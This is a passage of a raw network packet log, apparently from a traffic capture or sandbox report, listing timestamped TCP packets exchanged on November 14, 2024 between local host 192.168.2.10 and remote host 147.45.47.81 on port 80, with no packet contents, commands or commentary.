                                                                                                                                                                                                            Nov 14, 2024 12:19:57.140383959 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.143121958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.143132925 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.143141985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.143172026 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.160725117 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.160742044 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.160799980 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.160809994 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.160811901 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.160821915 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.160835028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.160860062 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.160934925 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.161348104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.161370993 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.161418915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.161497116 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.161508083 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.161519051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.161535978 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.161545038 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.161577940 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.162184954 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.162278891 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.162296057 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.162307978 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.162317991 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.162328959 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.162328959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.162348986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.162380934 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.162962914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.162986040 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.163002014 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.163060904 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.196295023 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259596109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259615898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259627104 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259637117 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259649038 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259673119 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259682894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259692907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259953022 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259953022 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259968042 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.259999037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260010004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260020971 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260063887 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260117054 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260250092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260291100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260301113 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260334015 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260344982 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260353088 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260355949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260404110 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260406971 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260416985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260623932 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260917902 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260958910 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.260970116 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261018991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261022091 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261037111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261049032 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261059046 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261071920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261071920 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261081934 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261142015 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261742115 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261754036 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261765003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261797905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261809111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261815071 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261818886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261830091 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261841059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261852026 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261852980 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261862993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261873960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261894941 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.261933088 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.262563944 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.262635946 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.265557051 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.278059959 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.278084993 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.278094053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.278134108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.278143883 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.278167009 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.278239012 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.278872967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.278891087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.278942108 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284193993 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284216881 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284225941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284250975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284260988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284291983 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284331083 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284502029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284511089 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284567118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284607887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284704924 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284714937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284724951 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284734011 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284743071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284753084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284760952 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284764051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284807920 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.284837961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.285648108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.285716057 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.285725117 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.285734892 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.285751104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.285777092 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.285836935 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286204100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286215067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286231041 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286247015 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286256075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286263943 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286309958 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286777020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286787987 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286798954 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286818981 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286828041 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286835909 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286839008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286880970 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.286911011 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378268003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378304958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378309011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378341913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378350019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378443003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378480911 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378488064 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378509998 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378518105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378521919 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.378571033 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.380912066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.380963087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.380973101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381005049 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381040096 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381052971 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381062031 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381068945 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381084919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381094933 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381105900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381115913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381155968 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381194115 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381262064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381285906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381295919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381342888 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381408930 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381452084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381462097 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381491899 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381500959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381515026 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381576061 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381738901 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381762981 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381772995 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381795883 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381840944 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381844044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381854057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381882906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381892920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381902933 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381902933 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.381951094 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382107019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382168055 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382177114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382239103 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382262945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382332087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382342100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382352114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382375002 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382416964 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382530928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382539988 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382549047 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.382600069 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.398607016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.398622036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.398637056 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.398652077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.398725033 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.398751974 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.401668072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.401761055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.401771069 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.401781082 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.401792049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.401818037 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.401866913 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407597065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407641888 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407650948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407654047 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407697916 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407708883 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407718897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407728910 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407779932 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407944918 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407954931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407964945 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.407994032 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408035994 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408147097 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408168077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408179045 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408215046 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408225060 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408229113 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408272982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408648968 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408658028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408668041 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408710003 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408720016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408729076 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408729076 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408771992 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.408950090 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409027100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409037113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409045935 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409054995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409082890 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409122944 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409363031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409372091 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409382105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409418106 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409430981 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409441948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409441948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409454107 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409463882 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409488916 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409503937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409514904 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409523964 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409534931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409537077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409567118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.409589052 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.410271883 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.420591116 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.420615911 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.420624971 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.420705080 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.461905956 CET4995780192.168.2.10147.45.47.81
